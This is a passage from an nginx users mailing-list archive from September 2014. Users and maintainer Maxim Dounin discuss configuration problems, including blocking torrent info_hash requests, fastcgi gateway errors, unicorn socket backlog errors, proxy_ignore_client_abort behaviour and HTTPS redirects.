wrote: > Torrent clients have their own user agent normally, I had a need a while > back to block some which we used the magic 444 to kill it. > > if ($http_user_agent ~* (uTorrent|Transmission) ) { > return 444; > break; > } Just a note: you don't need "break" here.
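Grozdan's original pattern was a query string rather than a user agent; nginx exposes query parameters as `$arg_NAME` variables, so the `info_hash` requests can also be refused directly. A minimal sketch:

```nginx
# $arg_info_hash is non-empty whenever the request URI carries
# "?info_hash=..." (or "&info_hash=..."); returning 444 makes nginx
# close the connection without sending any response.
if ($arg_info_hash) {
    return 444;
}
```

This catches torrent clients regardless of their User-Agent string, so it complements the agent-based block above.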
-- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Tue Sep 2 13:58:50 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 2 Sep 2014 17:58:50 +0400 Subject: NGINX redirection issue In-Reply-To: References: <20140831024541.GS1849@mdounin.ru> Message-ID: <20140902135850.GL1849@mdounin.ru> Hello! On Mon, Sep 01, 2014 at 02:05:46PM -0400, manish-ezest wrote: > Hello Maxim, > > Like you suggested I have set "recursive_error_pages" to off but still I am > facing the problem. This time I am getting "504 Gateway Time-out" error. I > have already shared my NGINX and vhost configuration. We have one fastcgi > script running for serving error pages which checks the entry of > sample.xml(contains url) file and redirect the link to particular location. > If it doesn't find any page then it returns a 404 page. I am pasting the log > file of fastcgi script as well. The error is as clear as it could be: your backend failed to respond in time. As previously suggested, it may be due to the fact that it's overloaded. There are several options for fixing this: - Improve your backend performance by optimizing the code. - Add more resources to the backend cluster (more processes on a single server and/or more servers). - Rethink your nginx configuration to avoid using the script (e.g., use nginx configuration to do redirects instead; this should be much more efficient). In any case, everything in your configuration seems to work correctly as configured. -- Maxim Dounin http://nginx.org/ From otyugh at gmail.com Tue Sep 2 12:43:24 2014 From: otyugh at gmail.com (Otyugh) Date: Tue, 2 Sep 2014 14:43:24 +0200 Subject: Nginx + FastCGIwrap = 502 bad gateway Message-ID: <20140902144324.4d871889@gmail.com> Greetings, I'm trying to get a compiled C program to work using fcgi with nginx, but I'm shown a 502 Bad Gateway. The actual setup is: all programs in ./cgi-bin/*.cgi should use fcgiwrap. The actual result is that every matching address reports 502 Bad Gateway.
I'm not sure of what I am missing :s >sudo service fcgiwrap status [ ok ] Checking status of FastCGI wrapper: fcgiwrap running. >sudo netstat -anp | grep cgi unix 2 [ ACC ] STREAM LISTENING 12743 4055/fcgiwrap /var/run/fcgiwrap.socket relevant extract of /etc/nginx/sites-available/blog location ~ ^/cgi-bin/.*\.cgi$ { # Disable gzip (it makes scripts feel slower since they have to complete # before getting gzipped) gzip off; # Set the root to /usr/lib (inside this location this means that we are # giving access to the files under /usr/lib/cgi-bin) root /usr/lib; # Fastcgi socket fastcgi_pass unix:/var/run/fcgiwrap.socket; # Fastcgi parameters, include the standard ones include /etc/nginx/fastcgi_params; # Adjust non standard parameters (SCRIPT_FILENAME) fastcgi_param SCRIPT_FILENAME /usr/lib$fastcgi_script_name; } >tail -n 2 /var/log/nginx/error.log 2014/09/02 14:28:16 [error] 4324#0: *13 upstream prematurely closed FastCGI stdout while reading response header from upstream, client: 127.0.0.1, server: notyugh.pwnz.org, request: "GET /cgi-bin/helloworld.cgi HTTP/1.1", upstream: "fastcgi://unix:/var/run/fcgiwrap.socket:", host: "localhost" 2014/09/02 14:28:27 [error] 4324#0: *13 upstream prematurely closed FastCGI stdout while reading response header from upstream, client: 127.0.0.1, server: notyugh.pwnz.org, request: "GET /cgi-bin/FILEDONTEXIST.cgi HTTP/1.1", upstream: "fastcgi://unix:/var/run/fcgiwrap.socket:", host: "localhost" More info : > nginx -V nginx version: nginx/1.2.1 TLS SNI support enabled configure arguments: --prefix=/etc/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-log-path=/var/log/nginx/access.log --http-proxy-temp-path=/var/lib/nginx/proxy --lock-path=/var/lock/nginx.lock --pid-path=/var/run/nginx.pid --with-pcre-jit --with-http_gzip_static_module --with-http_ssl_module --with-ipv6 
--without-http_browser_module --without-http_geo_module --without-http_limit_req_module --without-http_limit_zone_module --without-http_memcached_module --without-http_referer_module --without-http_scgi_module --without-http_split_clients_module --with-http_stub_status_module --without-http_ssi_module --without-http_userid_module --without-http_uwsgi_module --add-module=/build/nginx-n55HQd/nginx-1.2.1/debian/modules/nginx-echo > dpkg -l | grep cgi ii fcgiwrap 1.0.3-3 armhf simple server to run CGI applications over FastCGI ii libfcgi0ldbl 2.4.0-8.1 armhf Shared library of FastCGI ii php5-cgi 5.4.4-14+deb7u14 armhf server-side, HTML-embedded scripting language (CGI binary) ii spawn-fcgi 1.6.3-1 armhf A fastcgi process spawner > uname -a Linux armServ 3.4.67+ #1 SMP PREEMPT Tue Dec 17 20:45:43 CET 2013 armv7l GNU/Linux From jon.clayton at rackspace.com Tue Sep 2 16:00:10 2014 From: jon.clayton at rackspace.com (Jon Clayton) Date: Tue, 2 Sep 2014 11:00:10 -0500 Subject: Socket connection failures on 1.6.1~precise Message-ID: <5405E98A.2070105@rackspace.com> I'm trying to track down an issue that is being presented only when I run nginx version 1.6.1-1~precise. My nodes running 1.6.0-1~precise do not display this issue, but freshly created servers are getting floods of these socket connection issues a couple times a day. /connect() to unix:/tmp/unicorn.sock failed (11: Resource temporarily unavailable) while connecting to upstream/ The setup I'm working with is nginx proxying requests to a unicorn socket powered by a ruby app. As stated above, the error is NOT present on nodes running 1.6.0-1~precise, but any newly created node gets the newer 1.6.1-1~precise package installed and will inevitably have that error. All settings from nodes running 1.6.0 appear to be the same as newly created nodes on 1.6.1 in terms of sysctl settings, nginx settings, and unicorn settings. All package versions are the same except for nginx. 
When I downgraded one of the newly created nodes to nginx 1.6.0 using the nginx ppa (ref: https://launchpad.net/~nginx/+archive/ubuntu/stable), the error was not present. Is there any advice, direction, or similar issue experienced that someone else might be able to help me track this down? -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Tue Sep 2 16:29:06 2014 From: nginx-forum at nginx.us (double) Date: Tue, 02 Sep 2014 12:29:06 -0400 Subject: proxy of "real_ip" Message-ID: <07761306b156355bfbda24826f969e27.NginxMailingListEnglish@forum.nginx.org> Hello, Is there a variable which stores the IP address of the proxy if I use the real-ip module. E.g. to log the client-ip as well as the proxy-ip (the IP address of the physical connection). Thanks a lot! Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253024,253024#msg-253024 From neutrino8 at gmail.com Tue Sep 2 16:38:29 2014 From: neutrino8 at gmail.com (Grozdan) Date: Tue, 2 Sep 2014 18:38:29 +0200 Subject: Deny certain words In-Reply-To: <20140902130955.GJ1849@mdounin.ru> References: <20140902130955.GJ1849@mdounin.ru> Message-ID: On Tue, Sep 2, 2014 at 3:09 PM, Maxim Dounin wrote: > Hello! > > On Tue, Sep 02, 2014 at 12:17:12PM +0100, Steve Wilson wrote: > >> Torrent clients have their own user agent normally, I had a need a while >> back to block some which we used the magic 444 to kill it. >> >> if ($http_user_agent ~* (uTorrent|Transmission) ) { >> return 444; >> break; >> } > > Just a note: you don't need "break" here. > > -- > Maxim Dounin > http://nginx.org/ Hi, As reported, the above code returns 444 on torrent clients trying to connect. However, my access logs get filled with nginx sending a 444 response to clients. Is there a way to filter this? I'm currently using grep -v 'info_hash' to filter but it'll be better if nginx can do this instead. 
Thanks > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -- Yours truly From nginx-forum at nginx.us Tue Sep 2 16:57:15 2014 From: nginx-forum at nginx.us (shmulik) Date: Tue, 02 Sep 2014 12:57:15 -0400 Subject: Understanding "proxy_ignore_client_abort" functionality Message-ID: Hi, I'm trying to understand how "proxy_ignore_client_abort" should affect connection to upstream server once client closes the connection, since it seems to behave different than i'm expecting. I'm using the proxy module, with buffering on and proxy_ignore_client_abort on as well (proxy_store off). For boring and not related reasons, once i start a connection to the upstream server i don't want to abort it, even if the client aborted the connection. However, even with "proxy_ignore_client_abort" on, once the client closes the connection i still see that the upstream connection is closed by nginx. I've run the scenario with a debugger and i see why this happens. This is the flow: 1. At first, in "ngx_http_upstream_init_request", if "proxy_ignore_client_abort" is on, nginx will not check for FIN/RST from client: //------------------------------------------------------------------------------------------------- if (!u->store && !r->post_action && !u->conf->ignore_client_abort) { r->read_event_handler = ngx_http_upstream_rd_check_broken_connection; r->write_event_handler = ngx_http_upstream_wr_check_broken_connection; } //------------------------------------------------------------------------------------------------- 2. Later on, when reading the body from upstream and writing to downstream, if client closed the connection the flag "p->downstream_error" is set to 1. 3. 
And the part that surprised me - in "ngx_http_upstream_process_request", if "downstream_error" flag is set, we also close the connection to upstream, regardless of the "proxy_ignore_client_abort" config: //------------------------------------------------------------------------------------------------- if (p->downstream_error) { ngx_log_debug0(NGX_LOG_DEBUG_HTTP, r->connection->log, 0, "http upstream downstream error"); if (!u->cacheable && !u->store && u->peer.connection) { ngx_http_upstream_finalize_request(r, u, NGX_ERROR); } } //------------------------------------------------------------------------------------------------- I'd expect the "proxy_ignore_client_abort" flag to be checked in the "if" in #3 as well (=don't close upstream connection if the flag is true). My first thought was that if the file should not be stored or cached - there is no reason to continue the connection to upstream, so that this is by design. However if that's the case then proxy_ignore_client_abort is redundant. Can you please shed some light on this? is this a bug? is it the desired behavior? (if so, please explain the reason behind it). I'm using Nginx ver 1.4.1 (though if i didn't miss anything it should be the same in the latest version). My location config (simplified) is: location ~ "^/fetch/(.*)" { proxy_pass http://$1; proxy_buffering on; proxy_buffers 10 1024k; proxy_ignore_client_abort on; proxy_max_temp_file_size 0; proxy_http_version 1.1; } Thanks in advance, Shmulik B Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253026,253026#msg-253026 From mdounin at mdounin.ru Tue Sep 2 19:14:48 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 2 Sep 2014 23:14:48 +0400 Subject: Socket connection failures on 1.6.1~precise In-Reply-To: <5405E98A.2070105@rackspace.com> References: <5405E98A.2070105@rackspace.com> Message-ID: <20140902191448.GP1849@mdounin.ru> Hello! 
On Tue, Sep 02, 2014 at 11:00:10AM -0500, Jon Clayton wrote: > I'm trying to track down an issue that is being presented only when I run > nginx version 1.6.1-1~precise. My nodes running 1.6.0-1~precise do not > display this issue, but freshly created servers are getting floods of these > socket connection issues a couple times a day. > > /connect() to unix:/tmp/unicorn.sock failed (11: Resource temporarily > unavailable) while connecting to upstream/ > > The setup I'm working with is nginx proxying requests to a unicorn socket > powered by a ruby app. As stated above, the error is NOT present on nodes > running 1.6.0-1~precise, but any newly created node gets the newer > 1.6.1-1~precise package installed and will inevitably have that error. > > All settings from nodes running 1.6.0 appear to be the same as newly created > nodes on 1.6.1 in terms of sysctl settings, nginx settings, and unicorn > settings. All package versions are the same except for nginx. When I > downgraded one of the newly created nodes to nginx 1.6.0 using the nginx ppa > (ref: > https://launchpad.net/~nginx/+archive/ubuntu/stable), the error was not > present. > > Is there any advice, direction, or similar issue experienced that someone > else might be able to help me track this down? Just some information: - In nginx itself, the difference between 1.6.0 and 1.6.1 is fairly minimal. The only change affecting http is one code line added in the 400 Bad Request handling code (see http://hg.nginx.org/nginx/rev/b8188afb3bbb). - The message suggests that the backend's backlog is full. This can easily happen on load spikes and/or if a backend is overloaded, and is usually unrelated to nginx itself.
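If the backlog really is filling, one knob on the application side is unicorn's listen backlog. A hedged sketch of a unicorn config fragment (the socket path is taken from the error message; the number is illustrative, and the kernel may additionally cap the queue via net.core.somaxconn):

```ruby
# config/unicorn.rb (sketch) -- :backlog sets the listen(2) queue
# length for the socket; raise net.core.somaxconn to match if needed.
listen "/tmp/unicorn.sock", :backlog => 2048
```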
-- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Tue Sep 2 19:19:14 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 2 Sep 2014 23:19:14 +0400 Subject: proxy of "real_ip" In-Reply-To: <07761306b156355bfbda24826f969e27.NginxMailingListEnglish@forum.nginx.org> References: <07761306b156355bfbda24826f969e27.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140902191913.GQ1849@mdounin.ru> Hello! On Tue, Sep 02, 2014 at 12:29:06PM -0400, double wrote: > Hello, > Is there a variable which stores the IP address of the proxy if I use the > real-ip module. > E.g. to log the client-ip as well as the proxy-ip (the IP address of the > physical connection). > Thanks a lot! No. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Tue Sep 2 19:42:48 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 2 Sep 2014 23:42:48 +0400 Subject: Understanding "proxy_ignore_client_abort" functionality In-Reply-To: References: Message-ID: <20140902194247.GR1849@mdounin.ru> Hello! On Tue, Sep 02, 2014 at 12:57:15PM -0400, shmulik wrote: > Hi, > I'm trying to understand how "proxy_ignore_client_abort" should affect > connection to upstream server once client closes the connection, since it > seems to behave different than i'm expecting. [...] > 3. 
And the part that surprised me - in "ngx_http_upstream_process_request", > if "downstream_error" flag is set, we also close the connection to upstream, > regardless of the "proxy_ignore_client_abort" config: > > //------------------------------------------------------------------------------------------------- > if (p->downstream_error) { > ngx_log_debug0(NGX_LOG_DEBUG_HTTP, r->connection->log, 0, > "http upstream downstream error"); > > if (!u->cacheable && !u->store && u->peer.connection) { > ngx_http_upstream_finalize_request(r, u, NGX_ERROR); > } > } > //------------------------------------------------------------------------------------------------- > > I'd expect the "proxy_ignore_client_abort" flag to be checked in the "if" in > #3 as well (=don't close upstream connection if the flag is true). > > My first thought was that if the file should not be stored or cached - there > is no reason to continue the connection to upstream, so that this is by > design. However if that's the case then proxy_ignore_client_abort is > redundant. The proxy_ignore_client_abort flag specifies whether nginx will monitor possible connection close while waiting for an upstream server response. If an error occurs while sending a response, the connection will be closed regardless of the flag, much like if there were no nginx at all. Switching proxy_ignore_client_abort to on may be needed in the following cases I'm aware of: - you need to maintain compatibility with clients that half-close connections after sending a request; - your backend doesn't check if a connection is closed while generating a response (and hence closing the connection by nginx will not abort the request processing on the backend), and at the same time you want nginx to maintain limit_conn numbers mostly matching actual resources used on the backend; - your backend does check if a connection is closed, but you don't want this to happen as your code can't really cope with it.
-- Maxim Dounin http://nginx.org/ From aleemb at gmail.com Tue Sep 2 19:50:27 2014 From: aleemb at gmail.com (Aleem B) Date: Wed, 3 Sep 2014 00:50:27 +0500 Subject: Get Selected backend info Message-ID: Hello, I couldn't find much information other than this thread which is a dead-end. I would like to add the selected backend/upstream to an "X-Backend" header before dispatching the request to the backend. In Varnish I can do this via: set req.http.X-Backend = req.backend In HAProxy I can do this via: http-send-name-header X-Backend However, I am stumped with Nginx. I imagine I could work around it by redirecting to the same server or some other trickery (not sure if that's a reasonable approach--what would the config look like in any case here?). Any other tips or suggestion are welcome. Thanks, Aleem -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Tue Sep 2 19:55:32 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 2 Sep 2014 23:55:32 +0400 Subject: Get Selected backend info In-Reply-To: References: Message-ID: <20140902195532.GS1849@mdounin.ru> Hello! On Wed, Sep 03, 2014 at 12:50:27AM +0500, Aleem B wrote: > Hello, > > I couldn't find much information other than this thread > which > is a dead-end. > > I would like to add the selected backend/upstream to an "X-Backend" header > before dispatching the request to the backend. You can't. The request is created _before_ the backend server will be selected (and the same request may be sent to more than one backend server due to proxy_next_upstream). 
-- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Tue Sep 2 20:04:40 2014 From: nginx-forum at nginx.us (shmulik) Date: Tue, 02 Sep 2014 16:04:40 -0400 Subject: Understanding "proxy_ignore_client_abort" functionality In-Reply-To: <20140902194247.GR1849@mdounin.ru> References: <20140902194247.GR1849@mdounin.ru> Message-ID: <69bcb8699d67a6731a8231068e0f9e36.NginxMailingListEnglish@forum.nginx.org> Thank you very much for the clarification. So if i understand correctly, the only way to achieve my original goal, without modifying the code is to use "proxy_store" - which is actually for saving the content to disk, but as a side effect will keep the connection to upstream going even if the client closed it. Is there another alternative i'm missing? Thanks, Shmulik B Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253026,253032#msg-253032 From jon.clayton at rackspace.com Tue Sep 2 20:35:03 2014 From: jon.clayton at rackspace.com (Jon Clayton) Date: Tue, 2 Sep 2014 15:35:03 -0500 Subject: Socket connection failures on 1.6.1~precise In-Reply-To: <20140902191448.GP1849@mdounin.ru> References: <5405E98A.2070105@rackspace.com> <20140902191448.GP1849@mdounin.ru> Message-ID: <540629F7.6050004@rackspace.com> I did see the changelog hadn't noted many changes and running a diff of the versions shows what you mentioned regarding the 400 bad request handling code. I'm not necessarily stating that nginx is the problem, but it would seem like something had changed enough to cause the backend's backlog to fill more rapidly. That could be a completely bogus statement as I've been attempting to find a way to track down exactly what backlog is being filled, but my test of downgrading nginx back to 1.6.0 from the nginx ppa seemed to also point at a change in nginx causing the issue since the errors did not persist after downgrading. 
It's very possible that I'm barking up the wrong tree, but the fact that only changing nginx versions back down to 1.6.0 from 1.6.1 eliminated the errors seems suspicious. I'll keep digging, but I'm open to any other suggestions. On 09/02/2014 02:14 PM, Maxim Dounin wrote: > Hello! > > On Tue, Sep 02, 2014 at 11:00:10AM -0500, Jon Clayton wrote: > >> I'm trying to track down an issue that is being presented only when I run >> nginx version 1.6.1-1~precise. My nodes running 1.6.0-1~precise do not >> display this issue, but freshly created servers are getting floods of these >> socket connection issues a couple times a day. >> >> /connect() to unix:/tmp/unicorn.sock failed (11: Resource temporarily >> unavailable) while connecting to upstream/ >> >> The setup I'm working with is nginx proxying requests to a unicorn socket >> powered by a ruby app. As stated above, the error is NOT present on nodes >> running 1.6.0-1~precise, but any newly created node gets the newer >> 1.6.1-1~precise package installed and will inevitably have that error. >> >> All settings from nodes running 1.6.0 appear to be the same as newly created >> nodes on 1.6.1 in terms of sysctl settings, nginx settings, and unicorn >> settings. All package versions are the same except for nginx. When I >> downgraded one of the newly created nodes to nginx 1.6.0 using the nginx ppa >> (ref: >> https://launchpad.net/~nginx/+archive/ubuntu/stable), the error was not >> present. >> >> Is there any advice, direction, or similar issue experienced that someone >> else might be able to help me track this down? > Just some information: > > - In nginx itself, the difference between 1.6.0 and 1.6.1 is fairy > minimal. The only change affecting http is one code line added > in the 400 Bad Request handling code > (see http://hg.nginx.org/nginx/rev/b8188afb3bbb). > > - The message suggests that backend's backlog is full. 
This can > easily happen on load spikes and/or if a backend is overloaded, > and usually unrelated to the nginx itself. > From nginx-forum at nginx.us Tue Sep 2 22:47:58 2014 From: nginx-forum at nginx.us (itpp2012) Date: Tue, 02 Sep 2014 18:47:58 -0400 Subject: Transforming nginx for Windows In-Reply-To: <7bb5e1c41a64ef81e91fdc361619bed3.NginxMailingListEnglish@forum.nginx.org> References: <7bb5e1c41a64ef81e91fdc361619bed3.NginxMailingListEnglish@forum.nginx.org> Message-ID: nginx for Windows, one year on? Time flies when you're having fun :) one year down the road transforming nginx, rewriting, re-developing, crashing, heavy battles with compilers, add-ons, c++ restrictions, ngxLuaDB powered by nginx for Windows, cross compiler, multi node imports... and yet here we are today, September 2, 2014! A huge thanks to our team for their relentlessness in getting problems solved, to agentzh for fixing VC issues, to nginx.inc developers for their fast fixes in the base version, to the beta testers for being daring :) and everyone else for your support. Which major items are next? - More non-blocking Lua, event based DLL add-ons like pagespeed, SharePoint, asp/dotnet. - Tcp proxy support. - Full 64 bit builds. - IO event and thread separation. - Distributed IO and CPU event processing. To date 18k+ independent downloads. 1200+ running in production. We ain't done yet, we're here to stay. Builds can be found here: http://nginx-win.ecsds.eu/ Follow releases https://twitter.com/nginx4Windows Posted at Nginx Forum: http://forum.nginx.org/read.php?2,242426,253034#msg-253034 From nginx-forum at nginx.us Wed Sep 3 07:53:03 2014 From: nginx-forum at nginx.us (manish-ezest) Date: Wed, 03 Sep 2014 03:53:03 -0400 Subject: NGINX redirection issue In-Reply-To: <20140902135850.GL1849@mdounin.ru> References: <20140902135850.GL1849@mdounin.ru> Message-ID: OK, thanks Maxim. I will check your recommendation and will let you know.
--Manish Posted at Nginx Forum: http://forum.nginx.org/read.php?2,252379,253036#msg-253036 From dewanggaba at xtremenitro.org Wed Sep 3 11:05:19 2014 From: dewanggaba at xtremenitro.org (Dewangga) Date: Wed, 03 Sep 2014 18:05:19 +0700 Subject: Reverse proxy didn't redirect http protocol Message-ID: <5406F5EF.104@xtremenitro.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello, I have a page contains 'http://' assets, and I do redirect on my nginx like this : - -------- BEGIN CONFIGURATION -------- server { listen 80; server_name subdomain.domain.com; return 301 https://$http_host$request_uri$is_args$query_string; } server { listen 443 ssl spdy; server_name subdomain.domain.com; location / { proxy_pass http://127.0.0.1:8080; } ssl on; ssl_certificate /etc/nginx/certs/star-domain.com-bundle.crt; ssl_certificate_key /etc/nginx/certs/star-domain.com.key; ssl_verify_depth 2; location ~* ^.+\.(jpg|jpeg|gif|png|css|js|ico)$ { root /home/kincirplay/public_html; expires 1y; add_header Link "<$scheme://$http_host$request_uri>; rel=\"prefetch\""; } } - -------- END CONFIGURATION -------- Here is my proxy.conf and ssl.conf configuration (stored on conf.d directory). proxy.conf http://ur1.ca/i45bu ssl.conf http://ur1.ca/i45bx Can I do redirect my http assets (without change the code) using this configuration? If can't, is it possible? If possible, I need your help to reconfigure the configuration. Thanks in advance :) -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBAgAGBQJUBvXuAAoJEEyntV5BtO+QjRMIAKa4YI/AEdOoJzRGIKUOun++ BbyuNKDH91vo3NJP8Q7CMkbFvPwLpbzy3HfZnUcXRObz9mS1D8KSpoIw2c67XhSh HjaBfcnlSPVwLm5bSyr3xbPi8rJHgxj8fDgQUGmPc9kqIwjPgGIyaOqS5qQ5C7fS uzsA8AL4/sm7yKFqULLHpMUqjz595GbMah9HQJCAZ8BQsYaTQ0CQB4khXdRSpQ/b XABBTknkQjJ4MO0NhEwAEu6aFeKJq2u3HJoaB58Vx/7pUifhXJKPAQl8TgbLMuSR qLC8gkFVJhK9cA4+pieMa3A6tUgt3WREZq3n9nP357DEVqw9PuoYZFbe09icYlk= =UzEE -----END PGP SIGNATURE----- -------------- next part -------------- A non-text attachment was scrubbed... 
Name: 0x41B4EF90.asc Type: application/pgp-keys Size: 1743 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: 0x41B4EF90.asc.sig Type: application/pgp-signature Size: 287 bytes Desc: not available URL: From nginx-forum at nginx.us Wed Sep 3 14:10:01 2014 From: nginx-forum at nginx.us (erankor2) Date: Wed, 03 Sep 2014 10:10:01 -0400 Subject: terminate a connection after sending headers In-Reply-To: <20140902130903.GI1849@mdounin.ru> References: <20140902130903.GI1849@mdounin.ru> Message-ID: Maxim, thank you very much for your response. To clarify - the problem is not about freeing the request (I don't think there's a resource leak here), the problem is that the connection is just left hanging until the client closes it / the server is restarted. It is true that write_event_handler gets initialized to zero when the request is allocated, but it is set to ngx_http_request_empty_handler before the first line of my code even runs. In ngx_http_core_content_phase there's: if (r->content_handler) { r->write_event_handler = ngx_http_request_empty_handler; ngx_http_finalize_request(r, r->content_handler(r)); return NGX_OK; } where r->content_handler is the entry point to my code. So, unless I explicitly reset it back to NULL (something that I never saw in any other nginx module) write_event_handler will not be null and the connection will be left hanging. I forked some sample hello world module and modified it to reproduce the problem, please check it out here: https://github.com/erankor/nginx-hello-world-module/blob/master/ngx_http_hello_world_module.c In that code, I'm sending the response headers and then trigger a timer for 1 second. In the timer callback I close the request with NGX_ERROR, but the connection remains active (I used a timer here since that's the easiest solution to defer the execution, in my real project I'm performing asynchronous file I/O) Thank you ! 
Eran Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253006,253040#msg-253040 From lists-nginx at swsystem.co.uk Wed Sep 3 14:33:48 2014 From: lists-nginx at swsystem.co.uk (Steve Wilson) Date: Wed, 03 Sep 2014 15:33:48 +0100 Subject: Deny certain words In-Reply-To: References: <20140902130955.GJ1849@mdounin.ru> Message-ID: On 02/09/2014 17:38, Grozdan wrote: > On Tue, Sep 2, 2014 at 3:09 PM, Maxim Dounin > wrote: >> Hello! >> >> On Tue, Sep 02, 2014 at 12:17:12PM +0100, Steve Wilson wrote: >> >>> Torrent clients have their own user agent normally, I had a need a >>> while >>> back to block some which we used the magic 444 to kill it. >>> >>> if ($http_user_agent ~* (uTorrent|Transmission) ) { >>> return 444; >>> break; >>> } >> >> Just a note: you don't need "break" here. >> >> -- >> Maxim Dounin >> http://nginx.org/ > > Hi, > > As reported, the above code returns 444 on torrent clients trying to > connect. However, my access logs get filled with nginx sending a 444 > response to clients. Is there a way to filter this? I'm currently > using grep -v 'info_hash' to filter but it'll be better if nginx can > do this instead. > > Thanks You could try; access_log off; Steve. From lists-nginx at swsystem.co.uk Wed Sep 3 15:07:28 2014 From: lists-nginx at swsystem.co.uk (Steve Wilson) Date: Wed, 03 Sep 2014 16:07:28 +0100 Subject: Deny certain words In-Reply-To: References: Message-ID: <28da1691be8eb444c005248e2a4c348d@swsystem.co.uk> I've just thought of another angle for this. Is this hitting your default/only site? If it's got a host header you could create a site just for that that bins all requests off with a 444 and no logging. On 02/09/2014 12:08, Grozdan wrote: > Hi, > > Somehow my server gets hit by torrent requests which look like this: > > GET /?info_hash=..... > > after the = come long strings of seemingly random hashes torrent > clients are looking for. 
> > I'd like to deny all such requests so would like if someone could > provide me how to deny everything (and including) ?info_hash= > > I've looked all over the net at similar examples but all I tried thus > far didn't work > > Thanks :) From neutrino8 at gmail.com Wed Sep 3 15:13:40 2014 From: neutrino8 at gmail.com (Grozdan) Date: Wed, 3 Sep 2014 17:13:40 +0200 Subject: Deny certain words In-Reply-To: <28da1691be8eb444c005248e2a4c348d@swsystem.co.uk> References: <28da1691be8eb444c005248e2a4c348d@swsystem.co.uk> Message-ID: On Wed, Sep 3, 2014 at 5:07 PM, Steve Wilson wrote: > I've just thought of another angle for this. Is this hitting your > default/only site? If it's got a host header you could create a site just > for that that bins all requests off with a 444 and no logging. Yes, it's the only site. I will try what you suggested. Thanks! > > > On 02/09/2014 12:08, Grozdan wrote: >> >> Hi, >> >> Somehow my server gets hit by torrent requests which look like this: >> >> GET /?info_hash=..... >> >> after the = come long strings of seemingly random hashes torrent >> clients are looking for. >> >> I'd like to deny all such requests so would like if someone could >> provide me how to deny everything (and including) ?info_hash= >> >> I've looked all over the net at similar examples but all I tried thus >> far didn't work >> >> Thanks :) > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -- Yours truly From neutrino8 at gmail.com Wed Sep 3 15:30:55 2014 From: neutrino8 at gmail.com (Grozdan) Date: Wed, 3 Sep 2014 17:30:55 +0200 Subject: Deny certain words In-Reply-To: References: <28da1691be8eb444c005248e2a4c348d@swsystem.co.uk> Message-ID: On Wed, Sep 3, 2014 at 5:13 PM, Grozdan wrote: > On Wed, Sep 3, 2014 at 5:07 PM, Steve Wilson wrote: >> I've just thought of another angle for this. Is this hitting your >> default/only site? 
If it's got a host header you could create a site just >> for that that bins all requests off with a 444 and no logging. > > Yes, it's the only site. I will try what you suggested. Thanks! Well, just as I went and try what you suggested I came on the nginx docs where it says you can use 'map directive' to decide what to log or not so I tried the below and it works Below goes inside http { .... } map $status $loggable { ~^444 0; default 1; } and in the vhost inside server { .... } goes the below access_log /var/log/nginx/vhost.access.log combined if=$loggable; This completely ignores disables logging of 444 responses > >> >> >> On 02/09/2014 12:08, Grozdan wrote: >>> >>> Hi, >>> >>> Somehow my server gets hit by torrent requests which look like this: >>> >>> GET /?info_hash=..... >>> >>> after the = come long strings of seemingly random hashes torrent >>> clients are looking for. >>> >>> I'd like to deny all such requests so would like if someone could >>> provide me how to deny everything (and including) ?info_hash= >>> >>> I've looked all over the net at similar examples but all I tried thus >>> far didn't work >>> >>> Thanks :) >> >> >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx > > > > -- > Yours truly -- Yours truly From nginx-forum at nginx.us Wed Sep 3 18:08:50 2014 From: nginx-forum at nginx.us (robinpanicker) Date: Wed, 03 Sep 2014 14:08:50 -0400 Subject: URL encoding for nginx rewrites Message-ID: <3d5dd0cb4f07fb4fe2a3461ed606d378.NginxMailingListEnglish@forum.nginx.org> Hello everyone. I am using a rewrite similar to below location /home { rewrite ^/(.*) https://mysite.com/homepage/?next=/redirectionurl redirect; } The issue is that nginx is not encoding the URL before it redirects. So this is failing at the server that is receiving this request. Can someone help me in encoding the rewritten URL. 
Thanks a lot in advance Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253045,253045#msg-253045 From georg at riseup.net Wed Sep 3 18:18:50 2014 From: georg at riseup.net (georg) Date: Wed, 03 Sep 2014 20:18:50 +0200 Subject: Questions regarding spdy module, browser behaviour and "access forbidden by rule" Message-ID: <54075B8A.2070304@riseup.net> [Not sure if this is the right list, because I'm uncertain if the following is intended behaviour or a problem in nginx or the involved browsers. So I would be happy if you could give me some advice and a pointer in case this mail should better be directed elsewhere; if so, sorry for the noise.] [Iceweasel is the name of Firefox in Debian.] Hi all, I've got a server running a current Debian Wheezy and nginx 1.6.1-1~bpo70+1. As this suggests, the packages (nginx-common and nginx-extras) are installed from wheezy-backports. This server has one private IP; the traffic to and from the public internet gets routed by haproxy on a different machine. I've tried out the spdy module to test how this changes page load times etc. On the webserver I'm hosting some static content, an etherpad and a dokuwiki. I've put the configuration for the dokuwiki vhost at [1]. This works just fine with Chromium 35.0.1916.153-1~deb7u1 (out of wheezy) and Iceweasel 24.8.0esr-1~deb7u1 (out of wheezy), no problems logged, neither in the browser nor in the nginx logs. However, 